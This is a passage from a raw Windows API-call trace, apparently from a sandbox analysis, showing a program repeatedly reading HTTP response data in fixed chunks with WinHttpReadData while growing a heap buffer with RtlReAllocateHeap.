lpBuffer=0x8975040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0115.225] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8740040, Size=0x23a000) returned 0x8500040 [0115.290] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8737840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8737840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0115.290] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x23c800) returned 0x8740040 [0115.332] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x897a040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x897a040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0115.333] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8740040, Size=0x23f000) returned 0x8500040 [0115.376] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x873c840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x873c840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0115.376] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x241800) returned 0x8740040 [0115.417] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x897f040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x897f040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0115.444] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8740040, Size=0x244000) returned 0x8990040 [0115.509] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8bd1840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8bd1840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0115.526] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8990040, Size=0x246800) returned 0x8500040 [0115.594] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8744040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8744040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0115.595] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x249000) returned 0x8750040 [0115.639] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8996840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8996840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0115.639] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8750040, Size=0x24b800) returned 0x8500040 [0115.702] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8749040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8749040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0115.726] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x24e000) returned 0x8750040 [0115.771] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x899b840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x899b840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0115.772] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8750040, Size=0x250800) returned 0x89a0040 [0115.818] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8bee040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8bee040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0115.823] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x89a0040, Size=0x253000) returned 0x8500040 [0115.892] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8750840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8750840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0115.894] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x255800) returned 0x8760040 [0115.945] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x89b3040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x89b3040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0115.957] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8760040, Size=0x258000) returned 0x8500040 [0116.028] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8755840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8755840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0116.043] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x25a800) returned 0x8760040 [0116.141] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x89b8040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x89b8040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0116.165] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8760040, Size=0x25d000) returned 0x8500040 [0116.211] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x875a840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x875a840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0116.211] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x25f800) returned 0x8760040 [0116.256] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x89bd040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x89bd040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0116.256] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8760040, Size=0x262000) returned 0x89c0040 [0116.341] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8c1f840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8c1f840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0116.388] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x89c0040, Size=0x264800) returned 0x8500040 [0116.858] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8762040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8762040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0116.900] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x267000) returned 0x8770040 [0117.006] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x89d4840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x89d4840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0117.035] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8770040, Size=0x269800) returned 0x8500040 [0117.080] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8767040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8767040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0117.506] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x26c000) returned 0x8770040 [0117.628] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x89d9840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x89d9840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0117.630] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8770040, Size=0x26e800) returned 0x8500040 [0117.687] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x876c040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x876c040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0117.759] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x271000) returned 0x8770040 [0117.861] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x89de840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x89de840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0117.863] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8770040, Size=0x273800) returned 0x89f0040 [0117.909] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8c61040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8c61040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0117.910] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x89f0040, Size=0x276000) returned 0x8500040 [0117.972] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8773840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8773840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0118.000] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x278800) returned 0x8780040 [0118.069] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x89f6040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x89f6040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0118.074] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8780040, Size=0x27b000) returned 0x8500040 [0118.169] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8778840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8778840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0118.219] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x27d800) returned 0x8780040 [0118.318] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x89fb040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x89fb040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0118.319] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8780040, Size=0x280000) returned 0x8a00040 [0118.381] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8c7d840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8c7d840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0118.381] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8a00040, Size=0x282800) returned 0x8500040 [0118.471] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8780040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8780040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0118.474] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x285000) returned 0x8790040 [0118.531] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8a12840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8a12840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0118.532] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8790040, Size=0x287800) returned 0x8500040 [0118.606] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8785040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8785040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0118.606] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x28a000) returned 0x8790040 [0118.652] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8a17840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8a17840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0118.653] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8790040, Size=0x28c800) returned 0x8500040 [0118.704] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x878a040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x878a040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0118.704] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x28f000) returned 0x8790040 [0118.780] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8a1c840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8a1c840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0118.786] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8790040, Size=0x291800) returned 0x8a20040 [0118.846] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8caf040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8caf040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0118.847] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8a20040, Size=0x294000) returned 0x8500040 [0118.927] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8791840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8791840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0118.927] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x296800) returned 0x87a0040 [0118.975] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8a34040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8a34040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0118.976] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x87a0040, Size=0x299000) returned 0x8500040 [0119.024] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8796840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8796840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0119.050] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x29b800) returned 0x87a0040 [0119.098] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8a39040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8a39040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0119.098] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x87a0040, Size=0x29e000) returned 0x8500040 [0119.172] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x879b840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x879b840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0119.172] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x2a0800) returned 0x87a0040 [0119.223] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8a3e040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8a3e040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0119.223] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x87a0040, Size=0x2a3000) returned 0x8a50040 [0119.274] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8cf0840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8cf0840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0119.302] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8a50040, Size=0x2a5800) returned 0x8500040 [0119.353] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x87a3040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x87a3040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0119.353] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x2a8000) returned 0x87b0040 [0119.421] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8a55840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8a55840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0119.459] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x87b0040, Size=0x2aa800) returned 0x8500040 [0119.516] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x87a8040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x87a8040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0119.518] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x2ad000) returned 0x87b0040 [0119.572] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8a5a840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8a5a840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0119.573] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x87b0040, Size=0x2af800) returned 0x8500040 [0119.622] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x87ad040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x87ad040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0119.647] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x2b2000) returned 0x87b0040 [0119.698] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8a5f840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8a5f840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0119.699] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x87b0040, Size=0x2b4800) returned 0x8a70040 [0119.750] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8d22040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8d22040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0119.751] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8a70040, Size=0x2b7000) returned 0x8500040 [0119.887] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x87b4840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x87b4840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0119.888] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x2b9800) returned 0x87c0040 [0119.945] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8a77040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8a77040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0119.946] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x87c0040, Size=0x2bc000) returned 0x8500040 [0120.023] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x87b9840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x87b9840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0120.023] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x2be800) returned 0x87c0040 [0120.079] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8a7c040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8a7c040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0120.083] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x87c0040, Size=0x2c1000) returned 0x8a80040 [0120.186] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8d3e840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8d3e840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0120.186] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8a80040, Size=0x2c3800) returned 0x8500040 [0120.270] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x87c1040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x87c1040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0120.271] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x2c6000) returned 0x87d0040 [0120.378] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8a93840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8a93840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0120.379] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x87d0040, Size=0x2c8800) returned 0x8500040 [0120.446] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x87c6040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x87c6040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0120.446] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x2cb000) returned 0x87d0040 [0120.538] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8a98840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8a98840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0120.539] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x87d0040, Size=0x2cd800) returned 0x8500040 [0120.601] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x87cb040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x87cb040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0120.602] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x2d0000) returned 0x87d0040 [0120.692] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8a9d840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8a9d840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0120.692] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x87d0040, Size=0x2d2800) returned 0x8ab0040 [0120.758] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8d80040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8d80040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0120.758] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8ab0040, Size=0x2d5000) returned 0x8500040 [0120.865] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x87d2840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x87d2840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0120.866] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x2d7800) returned 0x87e0040 [0120.919] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8ab5040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8ab5040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0120.920] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x87e0040, Size=0x2da000) returned 0x8500040 [0121.023] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x87d7840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x87d7840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0121.024] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x2dc800) returned 0x87e0040 [0121.086] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8aba040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8aba040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0121.117] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x87e0040, Size=0x2df000) returned 0x8500040 [0121.184] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x87dc840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x87dc840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0121.185] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x2e1800) returned 0x87e0040 [0121.307] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8abf040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8abf040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0121.312] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x87e0040, Size=0x2e4000) returned 0x8ad0040 [0121.384] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8db1840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8db1840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0121.415] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8ad0040, Size=0x2e6800) returned 0x8500040 [0121.484] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x87e4040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x87e4040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0121.486] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x2e9000) returned 0x87f0040 [0121.588] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8ad6840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8ad6840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0121.588] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x87f0040, Size=0x2eb800) returned 0x8500040 [0121.667] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x87e9040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x87e9040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0121.669] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x2ee000) returned 0x87f0040 [0121.771] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8adb840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8adb840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0121.772] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x87f0040, Size=0x2f0800) returned 0x8ae0040 [0121.891] WinHttpReadData (in: 